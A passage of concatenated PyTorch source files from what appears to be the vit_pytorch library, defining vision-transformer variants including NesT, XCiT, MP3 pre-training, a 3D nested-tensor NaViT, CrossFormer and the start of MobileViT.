mlp_mult, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.pos_emb = nn.Parameter(torch.randn(seq_len)) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dropout = dropout), FeedForward(dim, mlp_mult, dropout = dropout) ])) def forward(self, x): *_, h, w = x.shape pos_emb = self.pos_emb[:(h * w)] pos_emb = rearrange(pos_emb, '(h w) -> () () h w', h = h, w = w) x = x + pos_emb for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class NesT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, heads, num_hierarchies, block_repeats, mlp_mult = 4, channels = 3, dim_head = 64, dropout = 0. ): super().__init__() assert (image_size % patch_size) == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 fmap_size = image_size // patch_size blocks = 2 ** (num_hierarchies - 1) seq_len = (fmap_size // blocks) ** 2 # sequence length is held constant across hierarchy hierarchies = list(reversed(range(num_hierarchies))) mults = [2 ** i for i in reversed(hierarchies)] layer_heads = list(map(lambda t: t * heads, mults)) layer_dims = list(map(lambda t: t * dim, mults)) last_dim = layer_dims[-1] layer_dims = [*layer_dims, layer_dims[-1]] dim_pairs = zip(layer_dims[:-1], layer_dims[1:]) self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (p1 p2 c) h w', p1 = patch_size, p2 = patch_size), LayerNorm(patch_dim), nn.Conv2d(patch_dim, layer_dims[0], 1), LayerNorm(layer_dims[0]) ) block_repeats = cast_tuple(block_repeats, num_hierarchies) self.layers = nn.ModuleList([]) for level, heads, (dim_in, dim_out), block_repeat in zip(hierarchies, layer_heads, dim_pairs, block_repeats): is_last = level == 0 depth = block_repeat self.layers.append(nn.ModuleList([ Transformer(dim_in, seq_len, depth, heads, mlp_mult, dropout), Aggregate(dim_in, dim_out) if not is_last else nn.Identity() ])) self.mlp_head = nn.Sequential( LayerNorm(last_dim), Reduce('b c h w -> b c', 'mean'), nn.Linear(last_dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, c, h, w = x.shape num_hierarchies = len(self.layers) for level, (transformer, aggregate) in zip(reversed(range(num_hierarchies)), self.layers): block_size = 2 ** level x = rearrange(x, 'b c (b1 h) (b2 w) -> (b b1 b2) c h w', b1 = block_size, b2 = block_size) x = transformer(x) x = rearrange(x, '(b b1 b2) c h w -> b c (b1 h) (b2 w)', b1 = block_size, b2 = block_size) x = aggregate(x) return self.mlp_head(x) File: vit_pytorch/xcit.py from random import randrange import torch from torch import nn, einsum from torch.nn import Module, ModuleList import torch.nn.functional as F from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pack_one(t, pattern): return pack([t], pattern) def unpack_one(t, ps, pattern): return unpack(t, ps, pattern)[0] def l2norm(t): return F.normalize(t, dim = -1, p = 2) def dropout_layers(layers, dropout): if dropout == 0: return layers num_layers = len(layers) to_drop = torch.zeros(num_layers).uniform_(0., 1.) < dropout # make sure at least one layer makes it if all(to_drop): rand_index = randrange(num_layers) to_drop[rand_index] = False layers = [layer for (layer, drop) in zip(layers, to_drop) if not drop] return layers # classes class LayerScale(Module): def __init__(self, dim, fn, depth): super().__init__() if depth <= 18: init_eps = 0.1 elif 18 > depth <= 24: init_eps = 1e-5 else: init_eps = 1e-6 self.fn = fn self.scale = nn.Parameter(torch.full((dim,), init_eps)) def forward(self, x, **kwargs): return self.fn(x, **kwargs) * self.scale class FeedForward(Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): h = self.heads x = self.norm(x) context = x if not exists(context) else torch.cat((x, context), dim = 1) qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) sim = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(sim) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class XCAttention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.temperature = nn.Parameter(torch.ones(heads, 1, 1)) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): h = self.heads x, ps = pack_one(x, 'b * d') x = self.norm(x) q, k, v = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h d n', h = h), (q, k, v)) q, k = map(l2norm, (q, k)) sim = einsum('b h i n, b h j n -> b h i j', q, k) * self.temperature.exp() attn = self.attend(sim) attn = self.dropout(attn) out = einsum('b h i j, b h j n -> b h i n', attn, v) out = rearrange(out, 'b h d n -> b n (h d)') out = unpack_one(out, ps, 'b * d') return self.to_out(out) class LocalPatchInteraction(Module): def __init__(self, dim, kernel_size = 3): super().__init__() assert (kernel_size % 2) == 1 padding = kernel_size // 2 self.net = nn.Sequential( nn.LayerNorm(dim), Rearrange('b h w c -> b c h w'), nn.Conv2d(dim, dim, kernel_size, padding = padding, groups = dim), nn.BatchNorm2d(dim), nn.GELU(), nn.Conv2d(dim, dim, kernel_size, padding = padding, groups = dim), Rearrange('b c h w -> b h w c'), ) def forward(self, x): return self.net(x) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): layer = ind + 1 self.layers.append(ModuleList([ LayerScale(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = layer), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = layer) ])) def forward(self, x, context = None): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for attn, ff in layers: x = attn(x, context = context) + x x = ff(x) + x return x class XCATransformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, local_patch_kernel_size = 3, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): layer = ind + 1 self.layers.append(ModuleList([ LayerScale(dim, XCAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = layer), LayerScale(dim, LocalPatchInteraction(dim, local_patch_kernel_size), depth = layer), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = layer) ])) def forward(self, x): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for cross_covariance_attn, local_patch_interaction, ff in layers: x = cross_covariance_attn(x) + x x = local_patch_interaction(x) + x x = ff(x) + x return x class XCiT(Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, cls_depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., local_patch_kernel_size = 3, layer_dropout = 0. ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = 3 * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(dim)) self.dropout = nn.Dropout(emb_dropout) self.xcit_transformer = XCATransformer(dim, depth, heads, dim_head, mlp_dim, local_patch_kernel_size, dropout, layer_dropout) self.final_norm = nn.LayerNorm(dim) self.cls_transformer = Transformer(dim, cls_depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) x, ps = pack_one(x, 'b * d') b, n, _ = x.shape x += self.pos_embedding[:, :n] x = unpack_one(x, ps, 'b * d') x = self.dropout(x) x = self.xcit_transformer(x) x = self.final_norm(x) cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b) x = rearrange(x, 'b ... d -> b (...) d') cls_tokens = self.cls_transformer(cls_tokens, context = x) return self.mlp_head(cls_tokens[:, 0]) File: vit_pytorch/mp3.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # positional embedding def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32): _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb' omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1) omega = 1. / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pe.type(dtype) # feedforward class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # (cross)attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = self.norm(context) if exists(context) else x qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x, context = None): for attn, ff in self.layers: x = attn(x, context = context) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, num_classes, image_size, patch_size, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.dim = dim self.num_patches = num_patches self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.to_latent = nn.Identity() self.linear_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) # Masked Position Prediction Pre-Training class MP3(nn.Module): def __init__(self, vit: ViT, masking_ratio): super().__init__() self.vit = vit assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio dim = vit.dim self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, vit.num_patches) ) def forward(self, img): device = img.device tokens = self.vit.to_patch_embedding(img) tokens = rearrange(tokens, 'b ... d -> b (...) d') batch, num_patches, *_ = tokens.shape # Masking num_masked = int(self.masking_ratio * num_patches) rand_indices = torch.rand(batch, num_patches, device = device).argsort(dim = -1) masked_indices, unmasked_indices = rand_indices[:, :num_masked], rand_indices[:, num_masked:] batch_range = torch.arange(batch, device = device)[:, None] tokens_unmasked = tokens[batch_range, unmasked_indices] attended_tokens = self.vit.transformer(tokens, tokens_unmasked) logits = rearrange(self.mlp_head(attended_tokens), 'b n d -> (b n) d') # Define labels labels = repeat(torch.arange(num_patches, device = device), 'n -> (b n)', b = batch) loss = F.cross_entropy(logits, labels) return loss File: vit_pytorch/na_vit_nested_tensor_3d.py from __future__ import annotations from typing import List from functools import partial import torch import packaging.version as pkg_version if pkg_version.parse(torch.__version__) < pkg_version.parse('2.4'): print('nested tensor NaViT was tested on pytorch 2.4') from torch import nn, Tensor import torch.nn.functional as F from torch.nn import Module, ModuleList from torch.nested import nested_tensor from einops import rearrange from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # feedforward def FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim, bias = False) dim_inner = heads * dim_head self.heads = heads self.dim_head = dim_head self.to_queries = nn.Linear(dim, dim_inner, bias = False) self.to_keys = nn.Linear(dim, dim_inner, bias = False) self.to_values = nn.Linear(dim, dim_inner, bias = False) # in the paper, they employ qk rmsnorm, a way to stabilize attention # will use layernorm in place of rmsnorm, which has been shown to work in certain papers. requires l2norm on non-ragged dimension to be supported in nested tensors self.query_norm = nn.LayerNorm(dim_head, bias = False) self.key_norm = nn.LayerNorm(dim_head, bias = False) self.dropout = dropout self.to_out = nn.Linear(dim_inner, dim, bias = False) def forward( self, x, context: Tensor | None = None ): x = self.norm(x) # for attention pooling, one query pooling to entire sequence context = default(context, x) # queries, keys, values query = self.to_queries(x) key = self.to_keys(context) value = self.to_values(context) # split heads def split_heads(t): return t.unflatten(-1, (self.heads, self.dim_head)).transpose(1, 2).contiguous() # queries, keys, values query = self.to_queries(x) key = self.to_keys(context) value = self.to_values(context) # split heads def split_heads(t): return t.unflatten(-1, (self.heads, self.dim_head)) def transpose_head_seq(t): return t.transpose(1, 2) query, key, value = map(split_heads, (query, key, value)) # qk norm for attention stability query = self.query_norm(query) key = self.key_norm(key) query, key, value = map(transpose_head_seq, (query, key, value)) # attention out = F.scaled_dot_product_attention( query, key, value, dropout_p = self.dropout if self.training else 0. ) # merge heads out = out.transpose(1, 2).flatten(-2) return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = nn.LayerNorm(dim, bias = False) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class NaViT(Module): def __init__( self, *, image_size, max_frames, patch_size, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., num_registers = 4, token_dropout_prob: float | None = None ): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.token_dropout_prob = token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.' assert divisible_by(max_frames, frame_patch_size) patch_frame_dim, patch_height_dim, patch_width_dim = (max_frames // frame_patch_size), (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) * frame_patch_size self.channels = channels self.patch_size = patch_size self.to_patches = Rearrange('c (f pf) (h p1) (w p2) -> f h w (c p1 p2 pf)', p1 = patch_size, p2 = patch_size, pf = frame_patch_size) self.to_patch_embedding = nn.Sequential( nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embed_frame = nn.Parameter(torch.zeros(patch_frame_dim, dim)) self.pos_embed_height = nn.Parameter(torch.zeros(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.zeros(patch_width_dim, dim)) # register tokens self.register_tokens = nn.Parameter(torch.zeros(num_registers, dim)) nn.init.normal_(self.pos_embed_frame, std = 0.02) nn.init.normal_(self.pos_embed_height, std = 0.02) nn.init.normal_(self.pos_embed_width, std = 0.02) nn.init.normal_(self.register_tokens, std = 0.02) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, volumes: List[Tensor], # different resolution images / CT scans ): batch, device = len(volumes), self.device arange = partial(torch.arange, device = device) assert all([volume.ndim == 4 and volume.shape[0] == self.channels for volume in volumes]), f'all volumes must have {self.channels} channels and number of dimensions of {self.channels} (channels, frame, height, width)' all_patches = [self.to_patches(volume) for volume in volumes] # prepare factorized positional embedding height width indices positions = [] for patches in all_patches: patch_frame, patch_height, patch_width = patches.shape[:3] fhw_indices = torch.stack(torch.meshgrid((arange(patch_frame), arange(patch_height), arange(patch_width)), indexing = 'ij'), dim = -1) fhw_indices = rearrange(fhw_indices, 'f h w c -> (f h w) c') positions.append(fhw_indices) # need the sizes to compute token dropout + positional embedding tokens = [rearrange(patches, 'f h w d -> (f h w) d') for patches in all_patches] # handle token dropout seq_lens = torch.tensor([i.shape[0] for i in tokens], device = device) if self.training and self.token_dropout_prob > 0: keep_seq_lens = ((1. - self.token_dropout_prob) * seq_lens).int().clamp(min = 1) kept_tokens = [] kept_positions = [] for one_image_tokens, one_image_positions, seq_len, num_keep in zip(tokens, positions, seq_lens, keep_seq_lens): keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices one_image_kept_tokens = one_image_tokens[keep_indices] one_image_kept_positions = one_image_positions[keep_indices] kept_tokens.append(one_image_kept_tokens) kept_positions.append(one_image_kept_positions) tokens, positions, seq_lens = kept_tokens, kept_positions, keep_seq_lens # add all height and width factorized positions frame_indices, height_indices, width_indices = torch.cat(positions).unbind(dim = -1) frame_embed, height_embed, width_embed = self.pos_embed_frame[frame_indices], self.pos_embed_height[height_indices], self.pos_embed_width[width_indices] pos_embed = frame_embed + height_embed + width_embed tokens = torch.cat(tokens) # linear projection to patch embeddings tokens = self.to_patch_embedding(tokens) # absolute positions tokens = tokens + pos_embed # add register tokens tokens = tokens.split(seq_lens.tolist()) tokens = [torch.cat((self.register_tokens, one_tokens)) for one_tokens in tokens] # use nested tensor for transformers and save on padding computation tokens = nested_tensor(tokens, layout = torch.jagged, device = device) # embedding dropout tokens = self.dropout(tokens) # transformer tokens = self.transformer(tokens) # attention pooling # will use a jagged tensor for queries, as SDPA requires all inputs to be jagged, or not attn_pool_queries = [rearrange(self.attn_pool_queries, '... -> 1 ...')] * batch attn_pool_queries = nested_tensor(attn_pool_queries, layout = torch.jagged) pooled = self.attn_pool(attn_pool_queries, tokens) # back to unjagged logits = torch.stack(pooled.unbind()) logits = rearrange(logits, 'b 1 d -> b d') logits = self.to_latent(logits) return self.mlp_head(logits) # quick test if __name__ == '__main__': # works for torch 2.4 v = NaViT( image_size = 256, max_frames = 8, patch_size = 32, frame_patch_size = 2, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 volumetric data (videos or CT scans) of different resolutions - List[Tensor] volumes = [ torch.randn(3, 2, 256, 256), torch.randn(3, 8, 128, 128), torch.randn(3, 4, 128, 256), torch.randn(3, 2, 256, 128), torch.randn(3, 4, 64, 256) ] assert v(volumes).shape == (5, 1000) File: vit_pytorch/crossformer.py import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce import torch.nn.functional as F # helpers def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # cross embed layer class CrossEmbedLayer(nn.Module): def __init__( self, dim_in, dim_out, kernel_sizes, stride = 2 ): super().__init__() kernel_sizes = sorted(kernel_sizes) num_scales = len(kernel_sizes) # calculate the dimension at each scale dim_scales = [int(dim_out / (2 ** i)) for i in range(1, num_scales)] dim_scales = [*dim_scales, dim_out - sum(dim_scales)] self.convs = nn.ModuleList([]) for kernel, dim_scale in zip(kernel_sizes, dim_scales): self.convs.append(nn.Conv2d(dim_in, dim_scale, kernel, stride = stride, padding = (kernel - stride) // 2)) def forward(self, x): fmaps = tuple(map(lambda conv: conv(x), self.convs)) return torch.cat(fmaps, dim = 1) # dynamic positional bias def DynamicPositionBias(dim): return nn.Sequential( nn.Linear(2, dim), nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, dim), nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, dim), nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, 1), Rearrange('... () -> ...') ) # transformer classes class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b def FeedForward(dim, mult = 4, dropout = 0.): return nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1) ) class Attention(nn.Module): def __init__( self, dim, attn_type, window_size, dim_head = 32, dropout = 0. ): super().__init__() assert attn_type in {'short', 'long'}, 'attention type must be one of local or distant' heads = dim // dim_head self.heads = heads self.scale = dim_head ** -0.5 inner_dim = dim_head * heads self.attn_type = attn_type self.window_size = window_size self.norm = LayerNorm(dim) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False) self.to_out = nn.Conv2d(inner_dim, dim, 1) # positions self.dpb = DynamicPositionBias(dim // 4) # calculate and store indices for retrieving bias pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = grid[:, None] - grid[None, :] rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): *_, height, width, heads, wsz, device = *x.shape, self.heads, self.window_size, x.device # prenorm x = self.norm(x) # rearrange for short or long distance attention if self.attn_type == 'short': x = rearrange(x, 'b d (h s1) (w s2) -> (b h w) d s1 s2', s1 = wsz, s2 = wsz) elif self.attn_type == 'long': x = rearrange(x, 'b d (l1 h) (l2 w) -> (b h w) d l1 l2', l1 = wsz, l2 = wsz) # queries / keys / values q, k, v = self.to_qkv(x).chunk(3, dim = 1) # split heads q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> b h (x y) d', h = heads), (q, k, v)) q = q * self.scale sim = einsum('b h i d, b h j d -> b h i j', q, k) # add dynamic positional bias pos = torch.arange(-wsz, wsz + 1, device = device) rel_pos = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) rel_pos = rearrange(rel_pos, 'c i j -> (i j) c') biases = self.dpb(rel_pos.float()) rel_pos_bias = biases[self.rel_pos_indices] sim = sim + rel_pos_bias # attend attn = sim.softmax(dim = -1) attn = self.dropout(attn) # merge heads out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = wsz, y = wsz) out = self.to_out(out) # rearrange back for long or short distance attention if self.attn_type == 'short': out = rearrange(out, '(b h w) d s1 s2 -> b d (h s1) (w s2)', h = height // wsz, w = width // wsz) elif self.attn_type == 'long': out = rearrange(out, '(b h w) d l1 l2 -> b d (l1 h) (l2 w)', h = height // wsz, w = width // wsz) return out class Transformer(nn.Module): def __init__( self, dim, *, local_window_size, global_window_size, depth = 4, dim_head = 32, attn_dropout = 0., ff_dropout = 0., ): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, attn_type = 'short', window_size = local_window_size, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout), Attention(dim, attn_type = 'long', window_size = global_window_size, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout) ])) def forward(self, x): for short_attn, short_ff, long_attn, long_ff in self.layers: x = short_attn(x) + x x = short_ff(x) + x x = long_attn(x) + x x = long_ff(x) + x return x # classes class CrossFormer(nn.Module): def __init__( self, *, dim = (64, 128, 256, 512), depth = (2, 2, 8, 2), global_window_size = (8, 4, 2, 1), local_window_size = 7, cross_embed_kernel_sizes = ((4, 8, 16, 32), (2, 4), (2, 4), (2, 4)), cross_embed_strides = (4, 2, 2, 2), num_classes = 1000, attn_dropout = 0., ff_dropout = 0., channels = 3 ): super().__init__() dim = cast_tuple(dim, 4) depth = cast_tuple(depth, 4) global_window_size = cast_tuple(global_window_size, 4) local_window_size = cast_tuple(local_window_size, 4) cross_embed_kernel_sizes = cast_tuple(cross_embed_kernel_sizes, 4) cross_embed_strides = cast_tuple(cross_embed_strides, 4) assert len(dim) == 4 assert len(depth) == 4 assert len(global_window_size) == 4 assert len(local_window_size) == 4 assert len(cross_embed_kernel_sizes) == 4 assert len(cross_embed_strides) == 4 # dimensions last_dim = dim[-1] dims = [channels, *dim] dim_in_and_out = tuple(zip(dims[:-1], dims[1:])) # layers self.layers = nn.ModuleList([]) for (dim_in, dim_out), layers, global_wsz, local_wsz, cel_kernel_sizes, cel_stride in zip(dim_in_and_out, depth, global_window_size, local_window_size, cross_embed_kernel_sizes, cross_embed_strides): self.layers.append(nn.ModuleList([ CrossEmbedLayer(dim_in, dim_out, cel_kernel_sizes, stride = cel_stride), Transformer(dim_out, local_window_size = local_wsz, global_window_size = global_wsz, depth = layers, attn_dropout = attn_dropout, ff_dropout = ff_dropout) ])) # final logits self.to_logits = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(last_dim, num_classes) ) def forward(self, x): for cel, transformer in self.layers: x = cel(x) x = transformer(x) return self.to_logits(x) File: vit_pytorch/mobile_vit.py import torch import torch.nn as nn from einops import rearrange from einops.layers.torch import Reduce # helpers def conv_1x1_bn(inp, oup): return nn.Sequential( nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), nn.SiLU() ) def conv_nxn_bn(inp, oup, kernel_size=3, stride=1): return nn.Sequential( nn.Conv2d(inp, oup, kernel_size, stride, 1, bias=False), nn.BatchNorm2d(oup), nn.SiLU() ) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout=0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.SiLU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads=8, dim_head=64, dropout=0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim=-1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim=-1) q, k, v = map(lambda t: rearrange(t, 'b p n (h d) -> b p h n d', h=self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b p h n d -> b p n (h d)') return self.to_out(out) class Transformer(nn.Module): """Transformer block described in ViT. 